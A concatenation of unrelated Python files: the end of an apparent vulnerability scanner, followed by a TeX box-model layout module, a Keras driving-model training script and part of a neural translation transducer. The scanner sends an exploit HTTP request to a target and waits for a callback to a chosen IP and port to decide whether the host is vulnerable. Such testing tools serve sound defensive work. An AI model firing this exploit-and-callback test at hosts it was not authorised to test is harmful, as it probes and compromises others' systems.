opts, args = getopt.getopt(sys.argv[1:], "hdveH:i:p:rTxW", \
[
"help",
"debug",
"debug-verbose",
"ip-callback=",
"port-callback=",
"exploit-only",
"header=",
"result-only",
"skip-callback-test",
"use-system-proxy",
"disable-warnings",
"skip-http-test",
])
except getopt.GetoptError as err:
_ = err # Reserved for Future Use!
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif(o in ("-d", "--debug")):
setLogging(g_debug)
elif(o in ("-v", "--debug-verbose")):
setLogging(g_debug, logRequestsLib = True)
elif(o in ("-e", "--exploit-only")):
exploitOnly = True
elif(o in ("-H", "--header")):
exploitHeaderName = a
elif(o in ("-i", "--ip-callback")):
exploitCBIP = a
elif(o in ("-p", "--port-callback")):
if(len(a) > 0):
if(a.lower()[0] == "a"):
exploitCBPort = None
else:
try:
exploitCBPort = int(a)
except ValueError:
errorexit("Invalid Port Value: %s" % (a))
elif(o in ("-r", "--result-only")):
g_resultOnly = True
elif(o in ("-t", "--timeout-callback")):
try:
exploitCBTimeout = int(a)
except ValueError:
errorexit("Invalid Callback Timeout Value: %s" % (a))
elif(o in ("-T", "--skip-callback-test")):
cbOk = True
cbTestSkipped = True
elif(o in ("-x", "--use-system-proxy")):
useProxy = True
elif(o in ("-W", "--disable-warnings")):
disableWarnings = True
elif(o in ("--skip-http-test")):
skipHTTPTest = True
else:
usage()
if(len(args) < 1):
usage()
url = args[0]
## Option Processing END ------------------------------------------
## Test Setup BEGIN ------------------------------------------
if(not(useProxy)):
proxyEnabled = isSystemProxyEnabled()
if(proxyEnabled is None):
pass
if(not(skipHTTPTest)):
printStatus(
"Sending HTTP Request WITHOUT EXPLOIT for Connectivity Test",
url = url)
reqStatus = sendExploitedRequest(
url,
useProxy = useProxy,
noExploit = True)
printStatus(
"Exploit HTTP Request Sent",
url = url,
succeeded = str(reqStatus["succeeded"]),
http_status = str(reqStatus["status"]),
error = reqStatus["error"])
if((not(reqStatus.get("succeeded", False))) or
(reqStatus.get("status", -1) < 0)):
errorexit("Failed to Send Test HTTP Request (RESULTS WILL BE INVALID); Exiting!")
else:
httpTestSucceeded = True
if(exploitCBUserData is None):
exploitCBUserData = ("".join(random.choice(string.ascii_lowercase)
for i in range(LEN_RAND_DATA)))
debug("Random User Data String [len = %2d]: %s" %
(len(exploitCBUserData), exploitCBUserData))
if(not(exploitOnly)):
try:
g_tcpThread = TCPThread(
timeout = exploitCBTimeout,
searchString = exploitCBUserData,
port = exploitCBPort)
exploitCBPort = g_tcpThread.begin()
g_tcpThread.flushDebugQueue()
if(exploitCBPort is None):
errorexit("Failed to bind local listener port; Fatal Error...")
printStatus(
"Local Callback Listener Opened",
port = str(exploitCBPort))
except Exception as e:
errorexit("Failed to start TCP Thread: %s; Exiting..." %
(str(e)))
## Test Setup END ------------------------------------------
## Test Validation BEGIN ------------------------------------------
if(not(cbOk)):
printStatus("Validating Callback IP / Port reachability...")
cbOk = exploitCBTest(exploitCBIP, exploitCBPort)
printStatus("Callback IP / Port reachability Test",
exploitCBIP = exploitCBIP,
exploitCBPort = exploitCBPort,
status = ("SUCCEEDED" if(cbOk) else "FAILED"))
if(not(cbOk)):
TCPThread.waitForThread(g_tcpThread, cancel = True)
errorexit("Callback IP / Port Reachability Test FAILED; " +
"Fatal Error...")
## Test Validation END ------------------------------------------
## Exploit Test BEGIN ------------------------------------------
if(g_tcpThread is not None): g_tcpThread.flushDebugQueue()
printStatus(
"Sending Exploit HTTP Request",
url = url)
reqStatus = sendExploitedRequest(
url,
exploitHeaderName = exploitHeaderName,
exploitCBIP = exploitCBIP,
exploitCBPort = exploitCBPort,
exploitCBUserData = exploitCBUserData,
useProxy = useProxy)
if(g_tcpThread is not None): g_tcpThread.flushDebugQueue()
printStatus(
"Exploit HTTP Request Sent",
url = url,
succeeded = str(reqStatus["succeeded"]),
http_status = str(reqStatus["status"]),
error = reqStatus["error"])
if((reqStatus.get("succeeded", False)) and
(reqStatus.get("status", -1) > -1)):
if(not(exploitOnly)):
printStatus(
"Wait for Exploited Host Callback",
callbackIP = exploitCBIP,
callbackPort = exploitCBPort,
callbackTimeout = exploitCBTimeout)
try:
exploitSucceeded = TCPThread.waitForThread(g_tcpThread)
retval = (RETVAL_VULNERABLE if(exploitSucceeded)
else RETVAL_NOT_VULNERABLE)
except InterruptedError:
pass
if(not(g_evtAppExit.is_set())):
print("%-40s [%s]" % (
url,
("VULNERABLE" if(exploitSucceeded) else "not_vulnerable")))
else:
print("%-40s [%s]" % (
url,
"NO_RESULT_USER_CANCELLED"))
else:
if(g_tcpThread):
TCPThread.waitForThread(g_tcpThread, cancel = True)
if(httpTestSucceeded):
exploitSucceeded = False
retval = RETVAL_PATCHED
print("%-40s [%s]" % (
url,
"PATCHED"))
else:
print("%-40s [%s]" % (
url,
"TEST_FAILED"))
if(not(disableWarnings) and not(exploitSucceeded)):
if(cbTestSkipped): exploitCBTestWarning()
if(proxyEnabled): proxyWarning()
## Exploit Test END ------------------------------------------
return(retval)
#------------------------------------------------------------------------------
if(__name__ == "__main__"):
try:
sys.exit(main())
except KeyboardInterrupt:
pass
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
|
<reponame>masayuko/svgplotlib<filename>svgplotlib/TEX/Model.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# TeX-LIKE BOX MODEL
# The following is based directly on the document 'woven' from the
# TeX82 source code. This information is also available in printed
# form:
#
# <NAME>.. 1986. Computers and Typesetting, Volume B:
# TeX: The Program. Addison-Wesley Professional.
#
# The most relevant "chapters" are:
# Data structures for boxes and their friends
# Shipping pages out (Ship class)
# Packaging (hpack and vpack)
# Data structures for math mode
# Subroutines for math mode
# Typesetting math formulas
#
# Many of the docstrings below refer to a numbered "node" in that
# book, e.g. node123
#
# Note that (as TeX) y increases downward, unlike many other parts of
# matplotlib.
import math
# How much text shrinks when going to the next-smallest level. GROW_FACTOR
# must be the inverse of SHRINK_FACTOR.
SHRINK_FACTOR = 0.7
GROW_FACTOR = 1.0 / SHRINK_FACTOR
# The number of different sizes of chars to use, beyond which they will not
# get any smaller
NUM_SIZE_LEVELS = 6
# Percentage of x-height of additional horiz. space after sub/superscripts
SCRIPT_SPACE = 0.2
# Percentage of x-height that sub/superscripts drop below the baseline
SUBDROP = 0.3
# Percentage of x-height that superscripts drop below the baseline
SUP1 = 0.5
# Percentage of x-height that subscripts drop below the baseline
SUB1 = 0.0
# Percentage of x-height that superscripts are offset relative to the subscript
DELTA = 0.18
class MathTextWarning(Warning):
pass
class Node:
"""
A node in the TeX box model
"""
def __init__(self):
self.size = 0
def __repr__(self):
return self.__class__.__name__
def get_kerning(self, next):
return 0.
def shrink(self):
"""
Shrinks one level smaller. There are only three levels of
sizes, after which things will no longer get smaller.
"""
self.size += 1
def grow(self):
"""
Grows one level larger. There is no limit to how big
something can get.
"""
self.size -= 1
def render(self, renderer, x, y):
pass
class Box(Node):
"""
Represents any node with a physical location.
"""
def __init__(self, width, height, depth):
Node.__init__(self)
self.width = width
self.height = height
self.depth = depth
def shrink(self):
Node.shrink(self)
if self.size < NUM_SIZE_LEVELS:
self.width *= SHRINK_FACTOR
self.height *= SHRINK_FACTOR
self.depth *= SHRINK_FACTOR
def grow(self):
Node.grow(self)
self.width *= GROW_FACTOR
self.height *= GROW_FACTOR
self.depth *= GROW_FACTOR
def render(self, renderer, x1, y1, x2, y2):
pass
class Vbox(Box):
"""
A box with only height (zero width).
"""
def __init__(self, height, depth):
Box.__init__(self, 0., height, depth)
class Hbox(Box):
"""
A box with only width (zero height and depth).
"""
def __init__(self, width):
Box.__init__(self, width, 0., 0.)
class Char(Node):
"""
Represents a single character. Unlike TeX, the font information
and metrics are stored with each :class:`Char` to make it easier
to lookup the font metrics when needed. Note that TeX boxes have
a width, height, and depth, unlike Type1 and Truetype which use a
full bounding box and an advance in the x-direction. The metrics
must be converted to the TeX way, and the advance (if different
from width) must be converted into a :class:`Kern` node when the
:class:`Char` is added to its parent :class:`Hlist`.
"""
def __init__(self, c, state):
Node.__init__(self)
self.c = c
self.font_output = state.font_output
assert isinstance(state.font, (str, unicode, int))
self.font = state.font
self.font_class = state.font_class
self.fontsize = state.fontsize
self.dpi = state.dpi
# The real width, height and depth will be set during the
# pack phase, after we know the real fontsize
self._update_metrics()
def __repr__(self):
return '`%s`' % self.c
def _update_metrics(self):
metrics = self._metrics = self.font_output.get_metrics(
self.font, self.font_class, self.c, self.fontsize, self.dpi)
if self.c == ' ':
self.width = metrics.advance
else:
self.width = metrics.width
self.height = metrics.iceberg
self.depth = -(metrics.iceberg - metrics.height)
def is_slanted(self):
return self._metrics.slanted
def get_kerning(self, next):
"""
Return the amount of kerning between this and the given
character. Called when characters are strung together into
:class:`Hlist` to create :class:`Kern` nodes.
"""
advance = self._metrics.advance - self.width
kern = 0.
if isinstance(next, Char):
kern = self.font_output.get_kern(
self.font, self.font_class, self.c, self.fontsize,
next.font, next.font_class, next.c, next.fontsize,
self.dpi)
return advance + kern
def render(self, renderer, x, y):
"""
Render the character to the canvas
"""
font = self.font_output
info = font.get_info(self.font, self.font_class, self.c, self.fontsize, self.dpi)
used_characters = font.used_characters.setdefault(self.font, (self.font, set()))
used_characters[1].add(info.num)
renderer.render_glyph(x, y, info)
def shrink(self):
Node.shrink(self)
if self.size < NUM_SIZE_LEVELS:
self.fontsize *= SHRINK_FACTOR
self.width *= SHRINK_FACTOR
self.height *= SHRINK_FACTOR
self.depth *= SHRINK_FACTOR
def grow(self):
Node.grow(self)
self.fontsize *= GROW_FACTOR
self.width *= GROW_FACTOR
self.height *= GROW_FACTOR
self.depth *= GROW_FACTOR
class Accent(Char):
"""
The font metrics need to be dealt with differently for accents,
since they are already offset correctly from the baseline in
TrueType fonts.
"""
def _update_metrics(self):
metrics = self._metrics = self.font_output.get_metrics(
self.font, self.font_class, self.c, self.fontsize, self.dpi)
self.width = metrics.xmax - metrics.xmin
self.height = metrics.ymax - metrics.ymin
self.depth = 0
def shrink(self):
Char.shrink(self)
self._update_metrics()
def grow(self):
Char.grow(self)
self._update_metrics()
def render(self, renderer, x, y):
"""
Render the character to the canvas.
"""
renderer.render_glyph(
x - self._metrics.xmin, y + self._metrics.ymin,
self.font, self.font_class, self.c, self.fontsize, self.dpi)
class List(Box):
"""
A list of nodes (either horizontal or vertical).
"""
def __init__(self, elements):
Box.__init__(self, 0., 0., 0.)
self.shift_amount = 0. # An arbitrary offset
self.children = elements # The child nodes of this list
# The following parameters are set in the vpack and hpack functions
self.glue_set = 0. # The glue setting of this list
self.glue_sign = 0 # 0: normal, -1: shrinking, 1: stretching
self.glue_order = 0 # The order of infinity (0 - 3) for the glue
def __repr__(self):
return '[%s <%.02f %.02f %.02f %.02f> %s]' % (
self.__class__.__name__,
self.width, self.height,
self.depth, self.shift_amount,
' '.join([repr(x) for x in self.children]))
def _determine_order(self, totals):
"""
A helper function to determine the highest order of glue
used by the members of this list. Used by vpack and hpack.
"""
o = 0
for i in range(len(totals) - 1, 0, -1):
if totals[i] != 0.0:
o = i
break
return o
def _set_glue(self, x, sign, totals, error_type):
o = self._determine_order(totals)
self.glue_order = o
self.glue_sign = sign
if totals[o] != 0.:
self.glue_set = x / totals[o]
else:
self.glue_sign = 0
self.glue_ratio = 0.
if o == 0:
if len(self.children):
warn("%s %s: %r" % (error_type, self.__class__.__name__, self),
MathTextWarning)
def shrink(self):
for child in self.children:
child.shrink()
Box.shrink(self)
if self.size < NUM_SIZE_LEVELS:
self.shift_amount *= SHRINK_FACTOR
self.glue_set *= SHRINK_FACTOR
def grow(self):
for child in self.children:
child.grow()
Box.grow(self)
self.shift_amount *= GROW_FACTOR
self.glue_set *= GROW_FACTOR
class Hlist(List):
"""
A horizontal list of boxes.
"""
def __init__(self, elements, w=0., m='additional', do_kern=True):
List.__init__(self, elements)
if do_kern:
self.kern()
self.hpack()
def kern(self):
"""
Insert :class:`Kern` nodes between :class:`Char` nodes to set
kerning. The :class:`Char` nodes themselves determine the
amount of kerning they need (in :meth:`~Char.get_kerning`),
and this function just creates the linked list in the correct
way.
"""
new_children = []
num_children = len(self.children)
if num_children:
for i in range(num_children):
elem = self.children[i]
if i < num_children - 1:
next = self.children[i + 1]
else:
next = None
new_children.append(elem)
kerning_distance = elem.get_kerning(next)
if kerning_distance != 0.:
kern = Kern(kerning_distance)
new_children.append(kern)
self.children = new_children
def hpack(self, w=0., m='additional'):
"""
The main duty of :meth:`hpack` is to compute the dimensions of
the resulting boxes, and to adjust the glue if one of those
dimensions is pre-specified. The computed sizes normally
enclose all of the material inside the new box; but some items
may stick out if negative glue is used, if the box is
overfull, or if a ``\\vbox`` includes other boxes that have
been shifted left.
- *w*: specifies a width
- *m*: is either 'exactly' or 'additional'.
Thus, ``hpack(w, 'exactly')`` produces a box whose width is
exactly *w*, while ``hpack(w, 'additional')`` yields a box
whose width is the natural width plus *w*. The default values
produce a box with the natural width.
"""
# I don't know why these get reset in TeX. Shift_amount is pretty
# much useless if we do.
#self.shift_amount = 0.
h = 0.
d = 0.
x = 0.
total_stretch = [0.] * 4
total_shrink = [0.] * 4
for p in self.children:
if isinstance(p, Char):
x += p.width
h = max(h, p.height)
d = max(d, p.depth)
elif isinstance(p, Box):
x += p.width
if not math.isinf(p.height) and not math.isinf(p.depth):
s = getattr(p, 'shift_amount', 0.)
h = max(h, p.height - s)
d = max(d, p.depth + s)
elif isinstance(p, Glue):
glue_spec = p.glue_spec
x += glue_spec.width
total_stretch[glue_spec.stretch_order] += glue_spec.stretch
total_shrink[glue_spec.shrink_order] += glue_spec.shrink
elif isinstance(p, Kern):
x += p.width
self.height = h
self.depth = d
if m == 'additional':
w += x
self.width = w
x = w - x
if x == 0.:
self.glue_sign = 0
self.glue_order = 0
self.glue_ratio = 0.
return
if x > 0.:
self._set_glue(x, 1, total_stretch, "Overfull")
else:
self._set_glue(x, -1, total_shrink, "Underfull")
class Vlist(List):
"""
A vertical list of boxes.
"""
def __init__(self, elements, h=0., m='additional'):
List.__init__(self, elements)
self.vpack()
def vpack(self, h=0., m='additional', l=float('inf')):
"""
The main duty of :meth:`vpack` is to compute the dimensions of
the resulting boxes, and to adjust the glue if one of those
dimensions is pre-specified.
- *h*: specifies a height
- *m*: is either 'exactly' or 'additional'.
- *l*: a maximum height
Thus, ``vpack(h, 'exactly')`` produces a box whose height is
exactly *h*, while ``vpack(h, 'additional')`` yields a box
whose height is the natural height plus *h*. The default
values produce a box with the natural width.
"""
# I don't know why these get reset in TeX. Shift_amount is pretty
# much useless if we do.
# self.shift_amount = 0.
w = 0.
d = 0.
x = 0.
total_stretch = [0.] * 4
total_shrink = [0.] * 4
for p in self.children:
if isinstance(p, Box):
x += d + p.height
d = p.depth
if not math.isinf(p.width):
s = getattr(p, 'shift_amount', 0.)
w = max(w, p.width + s)
elif isinstance(p, Glue):
x += d
d = 0.
glue_spec = p.glue_spec
x += glue_spec.width
total_stretch[glue_spec.stretch_order] += glue_spec.stretch
total_shrink[glue_spec.shrink_order] += glue_spec.shrink
elif isinstance(p, Kern):
x += d + p.width
d = 0.
elif isinstance(p, Char):
raise RuntimeError("Internal mathtext error: Char node found in Vlist.")
self.width = w
if d > l:
x += d - l
self.depth = l
else:
self.depth = d
if m == 'additional':
h += x
self.height = h
x = h - x
if x == 0:
self.glue_sign = 0
self.glue_order = 0
self.glue_ratio = 0.
return
if x > 0.:
self._set_glue(x, 1, total_stretch, "Overfull")
else:
self._set_glue(x, -1, total_shrink, "Underfull")
class Rule(Box):
"""
A :class:`Rule` node stands for a solid black rectangle; it has
*width*, *depth*, and *height* fields just as in an
:class:`Hlist`. However, if any of these dimensions is inf, the
actual value will be determined by running the rule up to the
boundary of the innermost enclosing box. This is called a "running
dimension." The width is never running in an :class:`Hlist`; the
height and depth are never running in a :class:`Vlist`.
"""
def __init__(self, width, height, depth, state):
Box.__init__(self, width, height, depth)
self.font_output = state.font_output
def render(self, renderer, x, y, w, h):
renderer.render_rect_filled(x, y, x + w, y + h)
class Hrule(Rule):
"""
Convenience class to create a horizontal rule.
"""
def __init__(self, state, thickness=None):
if thickness is None:
thickness = state.font_output.get_underline_thickness(state.fontsize, state.dpi)
height = depth = thickness * 0.5
Rule.__init__(self, float('inf'), height, depth, state)
class Vrule(Rule):
"""
Convenience class to create a vertical rule.
"""
def __init__(self, state):
thickness = state.font_output.get_underline_thickness(
state.font, state.fontsize, state.dpi)
Rule.__init__(self, thickness, float('inf'), float('inf'), state)
class Glue(Node):
"""
Most of the information in this object is stored in the underlying
:class:`GlueSpec` class, which is shared between multiple glue objects. (This
is a memory optimization which probably doesn't matter anymore, but it's
easier to stick to what TeX does.)
"""
def __init__(self, glue_type, copy=False):
Node.__init__(self)
self.glue_subtype = 'normal'
if isinstance(glue_type, (str, unicode)):
glue_spec = GlueSpec.factory(glue_type)
elif isinstance(glue_type, GlueSpec):
glue_spec = glue_type
else:
raise ArgumentError("glue_type must be a glue spec name or instance.")
if copy:
glue_spec = glue_spec.copy()
self.glue_spec = glue_spec
def shrink(self):
Node.shrink(self)
if self.size < NUM_SIZE_LEVELS:
if self.glue_spec.width != 0.:
self.glue_spec = self.glue_spec.copy()
self.glue_spec.width *= SHRINK_FACTOR
def grow(self):
Node.grow(self)
if self.glue_spec.width != 0.:
self.glue_spec = self.glue_spec.copy()
self.glue_spec.width *= GROW_FACTOR
class GlueSpec(object):
"""
See :class:`Glue`.
"""
def __init__(self, width=0., stretch=0., stretch_order=0, shrink=0., shrink_order=0):
self.width = width
self.stretch = stretch
self.stretch_order = stretch_order
self.shrink = shrink
self.shrink_order = shrink_order
def copy(self):
return GlueSpec(
self.width,
self.stretch,
self.stretch_order,
self.shrink,
self.shrink_order)
def factory(cls, glue_type):
return cls._types[glue_type]
factory = classmethod(factory)
GlueSpec._types = {
'fil': GlueSpec(0., 1., 1, 0., 0),
'fill': GlueSpec(0., 1., 2, 0., 0),
'filll': GlueSpec(0., 1., 3, 0., 0),
'neg_fil': GlueSpec(0., 0., 0, 1., 1),
'neg_fill': GlueSpec(0., 0., 0, 1., 2),
'neg_filll': GlueSpec(0., 0., 0, 1., 3),
'empty': GlueSpec(0., 0., 0, 0., 0),
'ss': GlueSpec(0., 1., 1, -1., 1)
}
# Some convenient ways to get common kinds of glue
class Fil(Glue):
def __init__(self):
Glue.__init__(self, 'fil')
class Fill(Glue):
def __init__(self):
Glue.__init__(self, 'fill')
class Filll(Glue):
def __init__(self):
Glue.__init__(self, 'filll')
class NegFil(Glue):
def __init__(self):
Glue.__init__(self, 'neg_fil')
class NegFill(Glue):
def __init__(self):
Glue.__init__(self, 'neg_fill')
class NegFilll(Glue):
def __init__(self):
Glue.__init__(self, 'neg_filll')
class SsGlue(Glue):
def __init__(self):
Glue.__init__(self, 'ss')
class HCentered(Hlist):
"""
A convenience class to create an :class:`Hlist` whose contents are
centered within its enclosing box.
"""
def __init__(self, elements):
Hlist.__init__(self, [SsGlue()] + elements + [SsGlue()],
do_kern=False)
class VCentered(Hlist):
"""
A convenience class to create a :class:`Vlist` whose contents are
centered within its enclosing box.
"""
def __init__(self, elements):
Vlist.__init__(self, [SsGlue()] + elements + [SsGlue()])
class Kern(Node):
"""
A :class:`Kern` node has a width field to specify a (normally
negative) amount of spacing. This spacing correction appears in
horizontal lists between letters like A and V when the font
designer said that it looks better to move them closer together or
further apart. A kern node can also appear in a vertical list,
when its *width* denotes additional spacing in the vertical
direction.
"""
def __init__(self, width):
Node.__init__(self)
self.width = width
def __repr__(self):
return "k%.02f" % self.width
def shrink(self):
Node.shrink(self)
if self.size < NUM_SIZE_LEVELS:
self.width *= SHRINK_FACTOR
def grow(self):
Node.grow(self)
self.width *= GROW_FACTOR
class SubSuperCluster(Hlist):
"""
:class:`SubSuperCluster` is a sort of hack to get around that fact
that this code do a two-pass parse like TeX. This lets us store
enough information in the hlist itself, namely the nucleus, sub-
and super-script, such that if another script follows that needs
to be attached, it can be reconfigured on the fly.
"""
def __init__(self):
self.nucleus = None
self.sub = None
self.super = None
Hlist.__init__(self, [])
class AutoHeightChar(Hlist):
"""
:class:`AutoHeightChar` will create a character as close to the
given height and depth as possible. When using a font with
multiple height versions of some characters (such as the BaKoMa
fonts), the correct glyph will be selected, otherwise this will
always just return a scaled version of the glyph.
"""
def __init__(self, c, height, depth, state, always=False):
alternatives = state.font_output.get_sized_alternatives_for_symbol(
state.font, c)
state = state.copy()
target_total = height + depth
for fontname, sym in alternatives:
state.font = fontname
char = Char(sym, state)
if char.height + char.depth >= target_total:
break
factor = target_total / (char.height + char.depth)
state.fontsize *= factor
char = Char(sym, state)
shift = (depth - char.depth)
Hlist.__init__(self, [char])
self.shift_amount = shift
class AutoWidthChar(Hlist):
"""
:class:`AutoWidthChar` will create a character as close to the
given width as possible. When using a font with multiple width
versions of some characters (such as the BaKoMa fonts), the
correct glyph will be selected, otherwise this will always just
return a scaled version of the glyph.
"""
def __init__(self, c, width, state, always=False, char_class=Char):
alternatives = state.font_output.get_sized_alternatives_for_symbol(
state.font, c)
state = state.copy()
for fontname, sym in alternatives:
state.font = fontname
char = char_class(sym, state)
if char.width >= width:
break
factor = width / char.width
state.fontsize *= factor
char = char_class(sym, state)
Hlist.__init__(self, [char])
self.width = char.width
class Ship:
"""
Once the boxes have been set up, this sends them to output. Since
boxes can be inside of boxes inside of boxes, the main work of
:class:`Ship` is done by two mutually recursive routines,
:meth:`hlist_out` and :meth:`vlist_out`, which traverse the
:class:`Hlist` nodes and :class:`Vlist` nodes inside of horizontal
and vertical boxes. The global variables used in TeX to store
state as it processes have become member variables here.
"""
def __call__(self, renderer, ox, oy, box):
self.max_push = 0 # Deepest nesting of push commands so far
self.cur_s = 0
self.cur_v = 0.
self.cur_h = 0.
self.off_h = ox
self.off_v = oy + box.height
self.hlist_out(renderer, box)
def clamp(value):
if value < -1000000000.:
return -1000000000.
if value > 1000000000.:
return 1000000000.
return value
clamp = staticmethod(clamp)
def hlist_out(self, renderer, box):
cur_g = 0
cur_glue = 0.
glue_order = box.glue_order
glue_sign = box.glue_sign
base_line = self.cur_v
left_edge = self.cur_h
self.cur_s += 1
self.max_push = max(self.cur_s, self.max_push)
clamp = self.clamp
for p in box.children:
if isinstance(p, Char):
p.render(renderer, self.cur_h + self.off_h, self.cur_v + self.off_v)
self.cur_h += p.width
elif isinstance(p, Kern):
self.cur_h += p.width
elif isinstance(p, List):
# node623
if len(p.children) == 0:
self.cur_h += p.width
else:
edge = self.cur_h
self.cur_v = base_line + p.shift_amount
if isinstance(p, Hlist):
self.hlist_out(renderer, p)
else:
# p.vpack(box.height + box.depth, 'exactly')
self.vlist_out(renderer, p)
self.cur_h = edge + p.width
self.cur_v = base_line
elif isinstance(p, Box):
# node624
rule_height = p.height
rule_depth = p.depth
rule_width = p.width
if math.isinf(rule_height):
rule_height = box.height
if math.isinf(rule_depth):
rule_depth = box.depth
if rule_height > 0 and rule_width > 0:
self.cur_v = baseline + rule_depth
p.render(renderer,
self.cur_h + self.off_h,
self.cur_v + self.off_v,
rule_width, rule_height)
self.cur_v = baseline
self.cur_h += rule_width
elif isinstance(p, Glue):
# node625
glue_spec = p.glue_spec
rule_width = glue_spec.width - cur_g
if glue_sign != 0: # normal
if glue_sign == 1: # stretching
if glue_spec.stretch_order == glue_order:
cur_glue += glue_spec.stretch
cur_g = round(clamp(float(box.glue_set) * cur_glue))
elif glue_spec.shrink_order == glue_order:
cur_glue += glue_spec.shrink
cur_g = round(clamp(float(box.glue_set) * cur_glue))
rule_width += cur_g
self.cur_h += rule_width
self.cur_s -= 1
def vlist_out(self, renderer, box):
cur_g = 0
cur_glue = 0.
glue_order = box.glue_order
glue_sign = box.glue_sign
self.cur_s += 1
self.max_push = max(self.max_push, self.cur_s)
left_edge = self.cur_h
self.cur_v -= box.height
top_edge = self.cur_v
clamp = self.clamp
for p in box.children:
if isinstance(p, Kern):
self.cur_v += p.width
elif isinstance(p, List):
if len(p.children) == 0:
self.cur_v += p.height + p.depth
else:
self.cur_v += p.height
self.cur_h = left_edge + p.shift_amount
save_v = self.cur_v
p.width = box.width
if isinstance(p, Hlist):
self.hlist_out(renderer, p)
else:
self.vlist_out(renderer, p)
self.cur_v = save_v + p.depth
self.cur_h = left_edge
elif isinstance(p, Box):
rule_height = p.height
rule_depth = p.depth
rule_width = p.width
if math.isinf(rule_width):
rule_width = box.width
rule_height += rule_depth
if rule_height > 0 and rule_depth > 0:
self.cur_v += rule_height
p.render(renderer,
self.cur_h + self.off_h,
self.cur_v + self.off_v,
rule_width, rule_height)
elif isinstance(p, Glue):
glue_spec = p.glue_spec
rule_height = glue_spec.width - cur_g
if glue_sign != 0: # normal
if glue_sign == 1: # stretching
if glue_spec.stretch_order == glue_order:
cur_glue += glue_spec.stretch
cur_g = round(clamp(float(box.glue_set) * cur_glue))
elif glue_spec.shrink_order == glue_order: # shrinking
cur_glue += glue_spec.shrink
cur_g = round(clamp(float(box.glue_set) * cur_glue))
rule_height += cur_g
self.cur_v += rule_height
elif isinstance(p, Char):
raise RuntimeError("Internal mathtext error: Char node found in vlist")
self.cur_s -= 1
ship = Ship() |
import csv
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Lambda
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.preprocessing.image import img_to_array, load_img
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
# Constants
steering_offset = 0.3
data_path = "data/"
# Load the data and offset the steering on left and right images.
def get_image_path_and_labels(data_file):
img_paths, steering_angles = [], []
with open(data_file) as fin:
skip_next_entry = True
for center_img, left_img, right_img, steering_angle, throttle, break_power, speed in csv.reader(fin):
# The first entry is just the header so skip it.
if skip_next_entry:
skip_next_entry = False
continue
# Add the center, left, and right images paths.
img_paths += [center_img.strip(), left_img.strip(), right_img.strip()]
# Append steering offset and add the angle.
steering_angles += [float(steering_angle), float(steering_angle) + steering_offset, float(steering_angle) - steering_offset]
return img_paths, steering_angles
# Process the image
def process_image(image_path, steering_angle):
# Compress the size to 100x100 so we can train faster.
image = load_img(image_path, target_size=(100,100,3))
image = img_to_array(image)
return image, steering_angle
# Generator
def generator(batch_size, x, y):
while 1:
batch_x, batch_y = [], []
for i in range(batch_size):
index = random.randint(0, len(x) - 1)
steering_angle = y[index]
image, steering_angle = process_image(data_path + x[index], steering_angle)
batch_x.append(image)
batch_y.append(steering_angle)
# Also add to the batch a flipped version of the image.
image_flipped = np.fliplr(image)
steering_angle_flipped = -steering_angle
batch_x.append(image_flipped)
batch_y.append(steering_angle_flipped)
yield np.array(batch_x), np.array(batch_y)
# Define the training model.
def model(shape):
# We must use SAME padding so the output size isn't reduced too small before flattening the network.
border_mode = 'same'
model = Sequential()
# Normalize the input.
model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=shape, output_shape=shape))
model.add(Convolution2D(24, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(36, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(48, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(64, 3, 3, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(64, 3, 3, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(1164, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(10, activation='relu'))
model.add(Dense(1, activation='linear'))
model.compile(loss='mse', optimizer="adam")
return model
# Train the model.
def train():
net = model(shape=(100,100,3))
# Print the strucutre of the network
for layer in net.layers:
print(layer, layer.output_shape)
# Get the image paths, and steering angles.
x, y = get_image_path_and_labels(data_path + 'driving_log.csv')
# Shuffle the data.
x, y = shuffle(x, y, random_state=42)
# Split into training and validation sets.
x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.15, random_state=42)
# Train the model.
net.fit_generator(generator(64, x_train, y_train),
validation_data=generator(64, x_val, y_val),
nb_val_samples=12000,
samples_per_epoch=48000,
nb_epoch=3)
# Save the model.
net.save('model.h5')
# Activate this script
if __name__ == '__main__':
train()
|
<gh_stars>100-1000
from typing import List
import numbers
import xnmt, xnmt.tensor_tools as tt
from xnmt import expression_seqs, param_collections
from xnmt.transducers import base as transducers
from xnmt.persistence import Serializable, serializable_init
if xnmt.backend_dynet:
import dynet as dy
if xnmt.backend_torch:
import torch.nn as nn
@xnmt.require_dynet
class ConvConnectedSeqTransducer(transducers.SeqTransducer, Serializable):
yaml_tag = '!ConvConnectedSeqTransducer'
"""
Input goes through through a first convolution in time and space, no stride,
dimension is not reduced, then CNN layer for each frame several times
Embedding sequence has same length as Input sequence
"""
@serializable_init
def __init__(self,
input_dim: numbers.Integral,
window_receptor: numbers.Integral,
output_dim: numbers.Integral,
num_layers: numbers.Integral,
internal_dim: numbers.Integral,
non_linearity: str = 'linear') -> None:
"""
Args:
num_layers: num layers after first receptor conv
input_dim: size of the inputs
window_receptor: window for the receptor
output_dim: size of the outputs
internal_dim: size of hidden dimension, internal dimension
non_linearity: Non linearity to apply between layers
"""
my_params = param_collections.ParamManager.my_params(self)
self.input_dim = input_dim
self.window_receptor = window_receptor
self.internal_dim = internal_dim
self.non_linearity = non_linearity
self.output_dim = output_dim
if self.non_linearity == 'linear':
self.gain = 1.0
elif self.non_linearity == 'tanh':
self.gain = 1.0
elif self.non_linearity == 'relu':
self.gain = 0.5
elif self.non_linearity == 'sigmoid':
self.gain = 4.0
normalInit=dy.NormalInitializer(0, 0.1)
